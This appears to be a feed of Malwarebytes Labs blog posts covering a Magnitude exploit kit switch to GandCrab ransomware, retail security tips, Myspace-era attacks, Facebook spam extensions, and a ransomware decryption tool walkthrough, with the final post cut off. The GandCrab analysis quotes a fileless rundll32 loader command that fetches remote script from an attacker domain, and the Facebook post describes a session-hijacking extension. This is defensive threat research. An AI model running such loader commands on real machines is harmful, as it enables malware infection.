Techie Feeds

Magnitude exploit kit switches to GandCrab ransomware

Malwarebytes - Tue, 04/17/2018 - 16:58

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. The variations of this technique have been known for several years and used by other families such as by Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.

"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication "; document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL


The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

5 cybersecurity questions retailers must ask to protect their businesses

Malwarebytes - Tue, 04/17/2018 - 15:00

The Target breach in 2013 may not be the biggest retail breach in history, but for many retailers, it was their watershed moment.

Point-of-sale (PoS) terminals were compromised for more than two weeks. 40 million card details and 70 million records of personal information swiped—part of which was “backlist,” historical transaction information dating back to more or less a decade ago. Card unions paid over $200 million in cost for card reissues. They then filed a class-action lawsuit against Target to regain this cost.

And the most mind-blowing fact of all? Target actually had (and still does have) cybersecurity measures in place and a security policy for employees to follow. How and why the breach even happened the way it happened remained the subject of discussion for a long time, and hard lessons were learned.

The good news for retailers is that it doesn’t (always) have to be this way.

Pose the right questions

Retailers of all shapes and sizes care about their businesses and clients. No merchant would want to be in the shoes of Target or TJX for a minute, post-breach. In fact, if they can keep something as big and messy and costly from happening to them, they would do anything.

It’s understandably challenging to add more to an already tall order of “things to do” in the retail industry; however, cybersecurity should no longer be seen as an afterthought, nor should it be treated like an option that one can get hyped up about today and then forget tomorrow. It has quickly become an integral part of any organization for the sake of business continuity, client retention, and brand integrity.

If you remain unconvinced whether you really need to incorporate cybersecurity in your business, perhaps this is a thought you can consider: If your organization uses any form of technology that connects to a data communication avenue and/or the Internet, chances are you need cybersecurity.

“Where do I start?” is probably not the right question to ask once you decide to kick off this journey, for you’ll most certainly receive an “I don’t know” or “I have no idea” just as instantly. Instead, be specific and practical. Come up with questions that you think you can answer. We have listed some below that you can use to guide you on your way.

What am I using in business that needs protecting?

Here, you can list down your valuable assets, beginning with the tangible (the retail store, CCTV cameras, mobile phones, point-of-sale machines, etc.) and then the intangible (your website, customer data, intellectual property, etc.). Once done, you can then find out ways to secure them individually according to your business’s needs. Most of the time, all you need to do is to configure your devices and peripherals to make the most use of security-related settings.

For example, installing smart CCTV cameras on-premise can both lessen the risk of physical theft and aid law enforcement in capturing criminals should something terrible happen in the shop. But who is watching your watcher? Better yet: Who else could be watching through your watcher? A lot of CCTV cameras can be accessed publicly via the Internet. You can secure these cameras and ensure that you and your staff are the only ones who can use them by setting them up to local-only mode and changing their admin names and passwords.

You may also decide to seek help from your service provider with more complicated devices and systems.

Read: Why you don’t need 27 different passwords

Should you wish to invest in software or tools, pick those that protect as many of your assets as possible. For example, many endpoint security solutions allow users to install it on multiple devices running on Windows.

What are the threats that can potentially affect my business?

Cybersecurity threats to retail businesses can come in the form of people or technology. We’re quite familiar with the former: from the petty thief to an organized crime group. There are also malicious insiders and basically anyone meaning to make money out of your business.

On the other hand, one thing merchants miss when identifying what could potentially introduce threats to their companies are the very technology (apps, modern payment systems, and others) they use or invest in to remain competitive. The dangers or risks introduced by these are usually accidental, and can be avoided entirely.

Customer data remains the primary target of fraud in the retail industry. For those who may not be in the know, one customer data may contain their credit or debit card details, spending patterns or habits, and loyalty behaviors, which can be retrieved from online shopping, digital marketing, and loyalty schemes they’re enrolled in.

Other threats retailers must keep in mind that they must defend themselves against malicious insiders, spear phishing, DDoS attacks, brute force attacks, reconnaissance and suspicious activity attacks, supply chain attacks, and more. If you’re a merchant that uses the omni-channel approach, be aware that there is now a new type of fraud in this environment. We’ll tackle this in depth in a future post.

How can I keep cybersecurity threats away from my business?

Merchants have gotten really good at handling traditional risks and threats to their businesses. But managing potential physical risks, which is fantastic, is one thing, and managing digital risks is another. For new and old merchants alike, thankfully they don’t have to start from scratch. There are already industry standards in place, such as the Payment Card Industry Security Council’s Data Security Standard (PCI DSS), that they can readily glean from. The Object Management Group (OMG), an international technology standards consortium, also has a cybersecurity standard that merchants may want to look into as well. And, oh, if you have clients in the UK and EU countries, let’s not forget GDPR.

As for other cybersecurity threats that need addressing, such as those that affect a merchant’s website, our Labs blog has a lot of great resources:

The National Federation of Retail Newsagents (NFRN), an organization composed of thousands of independent retailers in the UK and Northern Ireland, published a booklet that also serves as a checklist for merchants regarding assessing retail crime risk. This list includes physical security and cybersecurity.

Lastly, merchants must decide on a regular time to conduct a risk assessment—monthly, quarterly, biannually, or annually.

Should my employees get involved in mitigating cybersecurity risks?

Absolutely. When it comes to implementing good security practices in a retail business, merchants cannot do it alone. One way they can start employees off is by creating a culture of cybersecurity at the very beginning. Merchants can even incorporate awareness and basic cybersecurity concepts in their training process for new hires. Get them up to speed with the kinds of digital threats the business may come face-to-face with at some point in the future and provide them the steps on how to respond efficiently to red alert cases.

Read: How to create an intentional culture of cybersecurity

Note that training must be done on a regular basis and not just a one-off occurrence. It must also be relevant, practical, and engaging to employees. Use familiar case studies like the Target breach, or if your organization has experienced a form of cyberattack in the past, use that as a teaching moment, too.

What else can I do once I’ve secured the business’s assets?

Once you’ve done a great deal of securing, realize that the job doesn’t end there. There are still some things that need to be done:

  • Monitor your PCI environment on a regular basis. Doing so will notify you in real-time of potential intrusions in your payment system so you can nip the thread in the bud before the circumstance escalate.
  • Schedule a regular audit of security and compliance. This will ensure that your retail business remains in compliance with security and industry standards.
  • Join a community. Information sharing among fellow merchants is becoming a trend when it comes to cybersecurity. Firms learn from each other’s victories and mistakes. After all, cybercrime is not just a problem of one but of every organization in the industry. Cybersecurity, in this regard, is now a community effort.
  • Keep learning. Staying on top of the latest security news and industry challenges can help merchants familiarize themselves with tactics threat actors are using against retailers, assess their current situation, and make adjustments to their defenses and protocols accordingly.
  • Prioritize security and privacy when creating apps. Make sure that should you choose to develop software, such as apps, that you encourage your clients to install, make sure that you have security in mind in making these apps.
  • Create a security policy. This makes good computing practices not just feel like guidelines but actual procedures employees need to adhere to. Here are sample templates merchants can use as and tweak to their preference.
Stop chasing the wrong answers

Breaches are inevitable. This is a known fact and an often-repeated line by people in the cybersecurity industry. Companies have been advised to prepare.

That said, perhaps a merchant’s next and final question would be this: If a breach is inevitable, then what’s the point of doing all this?

It’s true that no one wants to invest a lot of time and money in security tools, services, and people to fight off breaches only to be told it’s not possible. The message they’re hearing is “the bad guys always win, and there’s nothing you can do about it.” However, this isn’t in-line with reality at all.

While there’s no such thing as perfect security, the protocols a multitude of companies have in place already helped them stop many breach attempts.

Unfortunately, sometimes threat actors do succeed in infiltrating a retailer’s network. In this case, the logical action is to contain it to prevent it from escalating and causing more damage. But containment and preventative steps cannot be done if proper security measures, guidelines, and a good security architecture aren’t in place, to begin with. Also, identifying what made it successful so the organization can make changes is part of the overall cybersecurity strategy. So putting them there isn’t really for naught.

The post 5 cybersecurity questions retailers must ask to protect their businesses appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Myspace vs. Facebook: the good old days?

Malwarebytes - Mon, 04/16/2018 - 16:13

Many people have fond memories of ye olde Myspace dotte comme, and those rose-splashed spectacles seem to have grown ever larger in light of the recent Facebook happenings.

In recent days, I’ve seen many declaring their love for all things Tom, and how everything was just one huge barrel of laughs and good times on the fledgling social network. In the showdown of Myspace vs. Facebook, articles are appearing that explain how Tom “beat” Zuckerberg in the long run.

However, a variety of popular memes and more general good vibes based on this sentiment clash with a somewhat more complicated picture of events.

Here’s the thing: I was around at that time, neck deep in social network research from about 2006 to 2010, and one of my main stomping grounds was indeed Myspace. During that time, I wrote about an astonishing amount of problems on the platform. I was responsible for getting a few of them fixed, having a number of bad actors thrown off, and causing lots of problems for adware vendors using so-called Web 2.0 as a testing ground for bogus installs, as well as creating similar headaches for malware authors popping everything from drive-by attacks to worms.

If you missed all of that action, or you simply weren’t around at the time, you might think the current social network bonfire we have on our hands is an entirely new phenomenon. I felt it was worth revisiting the land that time forgot (uh, a decade ago) and seeing what, exactly, was going on.

Way back when

Social network scams are now pretty samey, and new-fangled original attacks are fairly rare. Back in the early days of Myspace, everything was new and exciting, and even the most basic of survey scams or spam comments on someone’s profile page could potentially elicit a gasp or three. In 2006/7, the only people really attempting to harness the huge numbers of social media users were adware vendors and the odd malware author.

Over time, that would shift away from adware to hacks, trolls, and social engineering, leaving everything looking a bit scorched earth…not just on Myspace, but gradually across many other major social network platforms, too.

We begin our exploration of a complicated picture of events with a jaunt back to 2006.

2006: worms, adware, and get rich quick schemes

Looks like our DeLorean has indeed arrived in 2006, because Justin Timberlake is on the radio bringing Sexyback, Superman Returns to cinemas (when he probably shouldn’t have), and Twilight is going wild on bookshelves. Meanwhile our 3-year-old, 2.0 hangout space is starting to run into increasingly frequent trouble.

One of the first major social network worms ripped through Myspace courtesy of a worm hidden inside a Quicktime file. Alterations to infected profiles were made, utterly confusing the profile owners, and it seemed to spread in a manner similar to the first Orkut worm, even coming back to life after a profile clean out. The financial gain here was, in part, due to Zango adware being bundled with the infection file via the worm-creating affiliate who put the whole thing together.

In fact, Zango were caught up in another Myspace fiasco when they claimed they weren’t specifically targeting the platform for installs, despite the uncovering of an affiliate email suggesting just that. Here’s an extract, and the focus on animated gifs and cheery distractions is wonderfully quaint:

“MOVING GIFS. This really gets people’s attention and vistors [sic] love this sh**,” one tip reads. Another: “Highlight the html code and embed one of the videos. This will make it automatically pop when the visitor reaches that page. This will lead to a lot more thinking to themselves: ‘hmm, this looks like a cool video. I’ll watch this. CLICK.'” “More profitably, go to a bunch of your friends who have popular profiles and pay them (it’s up to you so much. One of my partners said 5$…maybe offer to split the money with them?) to put a zango video into their profile through your site. This will give you hundreds of extra installs a day,” the e-mail reads. “This probably works even better than having them on your actual site.”

Moving away from adware vendors. In 2018, malvertising is a big deal—but it’s also a rather old one. We can go back to 2006 and see the infamous WMF exploit being used to install malicious files via banner ads on Myspace, with up to “one million” installs across the thousand or so sites it was loading on. After a couple of years of a fresh new approach to interacting online, people with a taste for cash have moved into town and they have other ideas. Things will straighten themselves out next year, right?

2007: Battle of the bands and glory hunters

One of the wheels has fallen off the DeLorean, but we’re still hitting 88MPH, which is just as well because Shrek 3 and Spider-Man 3 are going off the rails in the cinema, and Rihanna has lost her umbrella. While we’re talking about music…

Most social networks have learned to keep profile page edit functionality to a minimum, or use templates, but Myspace was pretty much the king of “do what you want.” It’s hard to think of another social network that had so eminently editable a profile page. You could do all sorts of custom HTML tricks, hide elements, include new ones, overlay everything with huge sparkly gifs and half a dozen MIDI files—it was great (relatively speaking).

The flip side of this is that bad people could do the same thing.

In 2007, a large number of big name musicians with huge followings, and many smaller bands too, had their Myspace pages compromised. A quick splash of custom HTML later, and clicking anywhere on the page would redirect to rogue sites hosted in China offering up a variety of malicious installs. It was never established what, exactly, was the point of entry for the scammers but if it was a phishing campaign then it was sustained, targeted, and made life very difficult for musicians plying their trade.

Meanwhile, it would have been very handy if Justin Timberlake had brought Sexyback in 2007 instead, because I could have used it to work in a reference to another spate of high-profile compromises. The N*Sync golden boy fell victim to defacements, alongside Hilary Duff and Tila Tequila (if you weren’t nostalgically flopping around in 2007, you definitely are now). These attacks were much more about a sense of “look what we can do,” as opposed any financial gain, and that trend definitely began a steady curve upwards as we limp into 2008.

2008: Trolling, tracking, and hacks

Okay, the DeLorean is somewhat ablaze, and I’ve lost my novelty Tom bobblehead down the back of the seat, but we’re still mostly in one piece. Hunger Games is all the rage in bookstores, Katy Perry is all over the charts, and The Dark Knight is the best chaos-laden Batman movie you’ll ever see (no really, it is). Speaking of chaos…

Myspace had a big problem with troll groups, some of whom I covered in an IRISSCON talk last year. Back then, there weren’t many online sources of help for things like suicide prevention, drug addiction, or other forms of abuse. Myspace groups were, for many, the go-to place for help and advice. Trolls would show up and bomb the boards with gore pictures and worse, and many of the support groups set their boards to private, making them harder to find.

You know what’s bad? Support groups that are hard to find.

After the boards went into lockdown, someone coded up something called the Lottery Browser, which allowed you to click a button and be dumped into a private group at random. Things became problematic quite quickly after that. Harassment campaigns, targeted attacks, even some individuals who kept a sort of “suicide scoreboard,” claiming they were trying to encourage people to kill themselves for Internet kudos points. Myspace eventually fixed this one, too.

An offshoot from the same group created a few lines of code allowing someone visiting your Myspace profile to be auto-subscribed to your video channel. In practice, this meant that you could see, at a glance, if security researchers or law enforcement were checking you out. This was very common on Myspace, and many local law enforcement officers would create profiles and friend people in their area. Nothing says “burn your hard drives” like Officer Jones showing up on your follow list if you’re up to no good.

Myspace had actually blocked most, if not all, IP trackers on profiles, meaning someone couldn’t send you a bogus link and grab an IP. However, it’s arguably more useful to know specifically who is being subscribed to your video list. One of the solutions to this was adding the video portion of the Myspace URL to your hosts file; Myspace eventually fixed this, too, after I brought it to their attention.

In short, things were a bit of a mess, and while social networks of the time had slowly come to terms with malware attacks and adware vendors, the less visible types of social engineering/trolling were a tough nut to crack.

2009: Goodbye Myspace, Hello Facebook

We’ve done it now. The DeLorean is on fire and the book charts are awash with more Hunger Games and Maze Runners. I refuse to watch Avatar, and Beyonce is all about putting a ring on it. I’m trapped in a land of people slowly losing interest in Myspace, while the “like” counter continues to rise for the somewhat cooler juggernaut that is Facebook.

Look, I am definitely not watching Avatar.

Instead, let me direct you to a diagnosis, because Dr. Boyd detects a terminal lack of Myspace scams in exchange for…Facebook privacy control concerns! Honesty boxes! Phishing! These examples are anecdotal and specific to my own research, but in general 2009 felt like a shift away from the elder network onto a portal increasingly holding all the cards. I’m not sure when I wrote my last batch of “lots of problems on Myspace, and here they are” blog posts, but at this point Facebook and Twitter were the places to be. Sorry, Tom.

No stone left unturned

Actually, we have a dump-truck sized stack of rocks we haven’t poked yet. I didn’t get chance to mention 2005’s Samy worm, the near half a million “private” photos that appeared in a Torrent, the 20 year long collection of independent privacy assessments, or…well…you get the idea.

I love social networks. I think they’re great, for the most part. But the ones we have now probably have just as many problems as the sites we’ve abandoned. The specifics may differ, but ultimately none of them are perfect, and the notion that everything was ideal back in the day is a potentially dangerous one.

Those who ignore history are doomed to stand around next to a crater-shaped DeLorean complaining about Avatar. Thankfully, the music is great.

The post Myspace vs. Facebook: the good old days? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Week in security (April 09 – April 15)

Malwarebytes - Mon, 04/16/2018 - 15:05

Last week, we took a look at a malware-campaign called FakeUpdates, methods to use secure instant messaging, the inner workings of a decryption tool, and some Facebook spam campaigns.

We also published our first quarterly Malwarebytes Labs CTNT report of 2018.

Other news
  • A security researcher discovered a flaw in P.F.Changs Rewards website. (Source:
  • Security Consultant Xavier Mertens described a suspicious use of certutil.exe. (Source: InfoSec Handlers Diary Blog)
  • A significant number of Cisco devices belonging to organizations in Russia and Iran were hacked by a group calling itself JHT. (Source: The Hacker News)
  • Facebook CEO Mark Zuckerberg spoke at a joint hearing of the US Senate judiciary and commerce committees in Washington, DC. (Source: siliconrepublic)
  • A vulnerability in Microsoft Outlook allowed hackers to steal a user’s Windows password. (Source: ThreatPost)
  • A malware gang is going for identity theft and phony tax refunds by targeting CPAs. (Source: Krebs on Security)
  • Researchers sinkholed the infamous EITest infection chain. (Source: SecurityWeek)
  • A Microsoft network engineer was charged with money laundering linked to Reveton computer ransomware. (Source: SunSentinel)
  • Intel has addressed a vulnerability in the configuration of several CPU series that allow an attacker to alter the behavior of the chip’s SPI Flash memory. (Source: Bleeping Computer)
  • An old and flawed Javascript crypto-library could allow Bitcoin theft. (Source: The Register)

Stay safe, everyone!

The post Week in security (April 09 – April 15) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Facebook spammers making things worse

Malwarebytes - Fri, 04/13/2018 - 15:00

Facebook’s having a bad couple of weeks. Between Congressional testimony and new information coming forward about Cambridge Analytica’s use of user data, the tech giant is having problems keeping its users aboard. Unfortunately, misery loves company. We noticed a few Facebook spam campaigns this week that can only make things worse.

Should a browser extension be able to add a Facebook app?

The first of the Facebook spammers was pointed out by one of our forum visitors. While the campaign was aimed at Finnish Facebook users, the origin is probably not Finnish, so this one could be coming to a Facebook timeline near you anytime soon.

The modus operandi was like this: A website was set up to install a forced Firefox extension claiming you need a Flash update.

Translation: your Flash player has expired, and you need to update in order for the website to work properly. Accept/install flash updates and add them into your browser.

Once installed, the extension looked like this:

Looks legit, right?

What has this got to do with Facebook, you ask? Users that installed this extension and were logged into Facebook at the same time in the same browser got a bonus: A Facebook app, reportedly using several different names like HTC Sense, Spotify, and Pandora. This app started spamming the user groups the affected Facebook account belonged to with messages like this:

An English version of this post (courtesy of Facebook) would look like this:

So the threat actors would have you Google a certain key phrase and made sure you ended up at a sponsored result that would offer high-end phones for unbelievable prices. And you know what they say about things that are to good to be true. The top search result for the keyword now goes to a Facebook page warning about this scam:

So, this about sums up how this intricate scheme worked, but the question that kept nagging at me is: Why can a Firefox extension install a Facebook app? Well, that’s a simple matter of permissions.

If you allow extensions to access your data for all websites (in this case, Facebook), even on other tabs, it can “borrow” your login session and install an app for you. Note that the extension needs you to “auto-login” to Facebook when it opens Facebook in a new tab (or pop-up).

In the xpi file that is the “de facto” Firefox extension, there are two heavily obfuscated JavaScripts called background.js and tokeneo.js. Together, they are able to open a pop-up asking for your permission to install a Facebook app and confirming that action at the same time. All it needs is for you to be logged in to Facebook on one of the other tabs. And most Facebook users will automatically be logged in as soon as they open the site.

Partially deobfuscated snippet from tokeneo.js


Malwarebytes can remove the extension for you, as pointed out in our removal guide for Flash-paivitys, but you will have to remove the Facebook app manually. Look for the  names we have mentioned earlier:

  • HTC Sense
  • Spotify
  • Pandora

But keep in mind that they can adapt these easily. Rule of thumb for removing Facebook apps: If you can’t recall why you installed it, it should probably not be allowed to post on your behalf. We have reported the API that was used in the extension to Facebook, and they have taken it into consideration. Hopefully it will be blocked soon.




Oh, but there’s more

The other campaign that is making the rounds spams your Facebook friends by sending a so-called YouTube link via Messenger.

In fact, the link does not take you to YouTube at all, but to:{id number}&name={username}

Which only shows this button:

Clicking that button takes you to http://dosmil.puchamon[.]info/?wkr=manu&id={id number} &name={username}. It looks as if this has been removed by the host, but a look at the archives shows us that it very likely was a page asking for your permission to install yet another Facebook app.

And that app would have just as easily turned you into the next person spreading these Messenger links. This looks a lot like the “Is this you?” Messenger campaign that made the rounds last year. If they really are related, then the main goal is probably ad fraud by clickjacking.



Spam adds to burden

These two new spam campaigns are only adding to Facebook’s burden. While one is aimed at Finnish users (for now) and the other was rather quickly terminated, we expect both to resurface in one form or another.

If Facebook wants to have a close look at the apps that they allow on their platform, they should start by putting a big dent in the number of apps that are spreading malware, or simply clickfraud, and that propagate by spamming user groups, Messenger inboxes, and timelines in general.

Stay safe, everyone!

The post Facebook spammers making things worse appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Encryption 101: decryption tool code walkthrough

Malwarebytes - Thu, 04/12/2018 - 17:34

We have reached the final installment of our Encryption 101 series. In the prior post, we walked through, in detail, the thought process while looking at the Princess Locker ransomware. We talked about the specific ways to narrow down the analysis toward the encryption portions, the weaknesses in this specific encryption scheme, the potential options we might have for decryption, and finally we made a game plan for creating a decryption tool.

To continue off of that point, and to close off this series, we will be walking through the source code of the Princess Locker decryption tool, which my colleague hasherezade has created. After Part 4 of our series, you could have most likely used that information to create your own tool. However, just to solidify everything and make sure it all clicks, I will explain the details of this already functioning tool, as I believe it is much easier to understand something and create your own tools in the future if you see how an already-functioning one works.

The process of reversing engineering the encryption code and forward engineering the decryption code essentially covers the same point from multiple angles.

Code overview

Let’s first walk through all the functions in this program at a high level and do a quick overview of what they are and how they are used together. This will help the specific lines of code within each function make more sense when we are going through in detail.

The full source code of this tool is available here: Princess Locker decryption tool source code. I strongly recommend you follow along with full source code open in another window as you read this article.

Lets start from the top of the main.cpp file.

#define CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

If you remember from when we were analyzing the RNG portion of Princess, the numbers being generated were used as an index to look up a letter in this string. So, if the random number 38 was generated, it would have added the letter “c” to the victim ID string, since the “c” is at the 38th position if this is treated as an array. This is what the CHARSET is here.

Below is a list of the major functions that are worth talking about:


Any of the other functions I did not mention here because they are either not directly related to the decryption/key searching, or they are just self explanatory. For instance, read_buffer is literally what it sounds like: It is a helper function that reads a buffer in from a file. This is used within some of the above functions,  but it is not worth talking about specifically in detail.

find_key – Incrementally generates key with seed value, decrypts file, and checks against original file
dump_key – writes key out to file
check_key – uses a potential key,  decrypts file with it, and checks it against the original version
find_start_seed – wrapper function; calls others to find seed value which was used for UID or ext
find_seed – incrementally test seeds, generate random strings to verify against UID
find_key_seed – NOT USED, wrapper for find_seed with direction
find_uid_seed – wrapper for find seed, setting isKey param to false

Of all of these, the find_seed and find_key are the two functions that are doing the major portion of the work.

Main function

Now let’s start from the wmain() function and walk through all the logic in detail.

We will skip past to the line on 314,  printf(“Searching the key…“);

Everything pictured above is just input checking to make sure everything that is needed was provided properly.

The rest of the main is below:

The next line is DWORD init_seed = time(NULL); This is just getting the current time. This will be the first seed we test against. We know from Part 4 that the current time was the only input being used to seed the random number generator. So, we will be using the current time and decrementing this doing our test key generation as we go on.

do { DWORD uid_seed = find_start_seed(unique_id, extension, init_seed); key = find_key(filename1, filename2, check_size, uid_seed, limit); init_seed = uid_seed - 1; } while (!key);

We see the find_start_seed function being called. The parameters unique_id, extension, init_seed at this point are the following in order: ransom note ID or NULL if none is used, random file extension, which Princess added on, and current time. As the loop progresses, the init_seed is decremented because we essentially are trying to find the exact second when the Princess infection occurred on these files.

There are three different second values which were used for seeding each of the RNG uses. As I mentioned in the previous post, they are the extension, the UID, and the AES key password. Once we find one of these, the others are very close by in time, so we can easily find the others.

Let’s look at the details of find_start_seed before continuing on. Let’s assume we are passing in a UID we got from the ransom note.

The first call you see inside of here is the find_uid_seed(). This is a wrapper function to find_seed(), which is the main workhorse. The false boolean variable passed in is telling it to decrement when searching for the UID value. This makes sense because the seed we start with here is the current time, so obviously the infection has occurred in the past.

Before going into the details of the find_seed function, I’ll just go over a high level of what’s going on in the rest of this function. The result of find_uid_seed function will be the seed value, a.k.a the exact second which the RNG was seeded, to generate the ransom note ID during the infection.

You’ll notice the “if” for UID variable. This is here because the ransom ID is not a requirement. It is here to make the result more sure. If someone did not have their ransom ID referred to as UID, then they can still try to decrypt with just their file extension.

The reason this works is because the UID was one RNG seeding during infection, the random file extension was another, and the actual AES password was the third. So having either the extension or the UID should be enough to be able to find the AES password seed. If you do have both, however, you make it that much more verified.  Like a double verification.

Next we have the extension part:

if (uid) { ext_seed = find_uid_seed(ext, uid_seed, true); } else { ext_seed = find_uid_seed(ext, seed, false); }

What’s going on here is if UID was passed in, that means that we have found the seed value for UID. If that is the case, we can use that seed value (the time which the UID RNG was seeded) as the starting point for looking for the extension seed. In the analysis of Princess Locker from Part 4, we saw that the UID was seeded first and then very soon after the extension RNG was seeded. So we can expect that the two seeds will be close in value.

This is why the true variable is passed in here. We are starting from the UID seed time and now counting forward to find the extension seed time. Now, if the UID was not provided by the user here, you see the same call is made with the false variable passed in. The seed is now the current time seed, which means we are just counting back from now until we find a seed match for the extension. 

if (uid && ext_seed - uid_seed > 100) { printf("[WARNING] Inconsistency detected!\n"); }

After it has found both the UID seed time and the ext seed, it then does this final check and makes sure that the difference is less than 100. The reason for this is again that during the Princess Locker execution, the UID seed is generated, and then very shortly after in code flow, the ext seed is generated. If these two times are more than 100 seconds apart, something strange is occurring.

DWORD find_uid_seed(wchar_t* uid, DWORD start_seed, bool increment = true) { return find_seed(uid, start_seed, increment, false); }

As I said before, find_uid_seed is just a wrapper for sind_seed, which is the main code that does the seed searching. So let’s go into that now.

After some variable initialization, we have the main loop of the function:

while (true) { srand(seed);

What’s going on in this loop in general is a recreation of the random number generation portion of the ransomware itself. This is why it starts with srand(seed). The seed is the time passed in. This will determine the sequence of numbers that comes after by using the rand call.

So in the loop we are building, the string by taking the random number as the index into the charset. If the number being generated does not match with the UID provided by the user, it knows that the seed is not correct, so it will decrement the time and try again.

If this function was being called to find the ext after it already found the UID in a previous call, the seed time would be incremented. Here is a picture of the timeline so you can understand when and why we increment vs. decrement in various stages.

So, the stage that you are starting from will determine if you pass true or false into this find_seed function to make it decrement time or increment time.

Back to main function

Now that we have covered the details of the find seed functions, let’s get back to the main function after the find_start_seed where we left off.

The find_start_seed is a series of loops in itself. So after this call, most likely, it will have found a working seed value. If both ransom ID and ext were provided, it will return the UID seed as it is closer in timeline to the AES password seed.

Otherwise, if the UID was not provided, it will return the seed it found for the extension. If we look at the timeline, we see that the UID seed time occurred after the AES seed time. This means that we will need to do a couple things in a loop:

  • decrement the seed one by one
  • attempt to generate a AES password using the random seed
  • decrypt the encrypted test file
  • check it against a known clean version

So let’s now take a look at the find_key function and talk about the mentioned steps here in detail.

wchar_t* find_key(IN wchar_t *filename1, IN wchar_t *filename2, size_t check_size, DWORD uid_seed, DWORD limit=100)

Again, I’ll skip past the initial parts of the code that are just doing some reading and error checking. We get to the interesting parts at line 234.

Setting the key_seed variable to the moment in time which the ransom note ID was generated, we found this with find_start_seed and passed it into the find_key function.

do { key = make_key(MAX_KEY, key_seed, true);

The first line in the loop for finding the keys here is the make_key call. I will not go into much detail here because it is not too different from how we generated UID or ext. It is just taking a seed and creating a random string the size of the ransom note ID using indexes to the charset string.

Next is a small loop for actually creating the AES key password and hashing it, which is what Princess Locker does. It does not use the randomly-generated password on its own. It created a random string and hashed it using sha256, then it used that as the key. Finally, it checked the key by decrypting.

for (key_len = MIN_KEY; key_len <= MAX_KEY; key_len++) { if (check_key(in_buf, expected_buf, check_size, key, key_len)) { printf("\nMatch found, accuracy %d/%d\n", check_size, BLOCK_LEN); key[key_len] = 0; found = true; break; } }

The check_key function performs the following:

aes_decrypt(inbuf, outbuf, BLOCK_LEN, key_str, key_len)

It’s creating an AES encryption using the test random-generated password, and seeing if it worked properly.

You may ask: Why waste time doing all the checks for the other RNGs? Why find the ext and the UID seed, when we could just start with the current time and decrement, testing if the seed works with a test AES decryption?

We could do this in theory. However, it is much faster of an operation to do a string comparison (which is all we need to do to find the UID seed) compared to:

  • Generating a random string
  • Hashing the string
  • Creating AES key
  • Encrypting data
  • Checking against clean file 

This is a lot more computationally intensive and would make the relatively fast UID search take much much longer.

Because the AES key was generated during the Princess Locker execution, and the ransom note ID was generated immediately after, once we find the ransom note ID (UID), we can then expect there will only be a few seconds of difference between these two seeds. So, this loop should only need to run a few times doing the encryption checks. Hopefully, you understand the efficiency of doing it the way that hasherezade has chosen.

Finishing off the find)key function, we basically just have some checks now, making sure it found the right key. If not, it will keep looping and decrementing the counter until it either finds it or hits a set limit.

Which brings us to the final portion of the main function at line 320:

If for whatever reason, it never found the correct AES password within the limit set, it most likely means that the seed time was not correct for the UID. So it will start over from the initial seed of one less than where it left off, and start this whole process over again. It will continue this until it finds a UID seed that works and a password seed close by.


Hopefully, this series has brought you up to speed on the art of finding exploits in ransomware encryption and creating decryption tools for them. Now, this not to say that if you master this specific weakness and this decryption tool, that it is easy to find and create one for a new ransomware. But, this is a step toward mastering one of the core skills.

Just like with exploit development/bug hunting, there are some core concepts and generic weaknesses that exist. The difficult/fun part is understanding the twists of those core concepts that any individual might come up with while creating their programs. It is about seeing the same concept or technique being used in an unfamiliar way, but ultimately understanding and identifying what the underlying mentality or technique is.

The important part is to understand the concepts. After that, it is a mix of creativity and thinking outside of the box to be able to identify and create your own exploits, or in our specific case, cracks for the ransomware encryption.

The post Encryption 101: decryption tool code walkthrough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Keeping your business and personal instant messages secure

Malwarebytes - Wed, 04/11/2018 - 15:00

Most people want to know their instant messages are securely wrapped up—whether that’s for personal privacy or making sure online scammers can’t grab the message content. If you’re sending text on a sensitive topic, or perhaps some photo attachments intended for one person only, you definitely wouldn’t want them falling into the wrong hands.

The same goes for business; what’s to prevent a disgruntled employee sending messages outside the network? There are a lot of solutions out there for better securing IMs. Here’s what we recommend.

The business cases

Many industries have compliance issues to contend with, and rogue IMs are one of the easiest ways to fall foul of an eye-watering fine. IM controls have been around for years as far as business is concerned, and most companies affected by this tend to have a number of solutions in place. Here are a few we suggest:

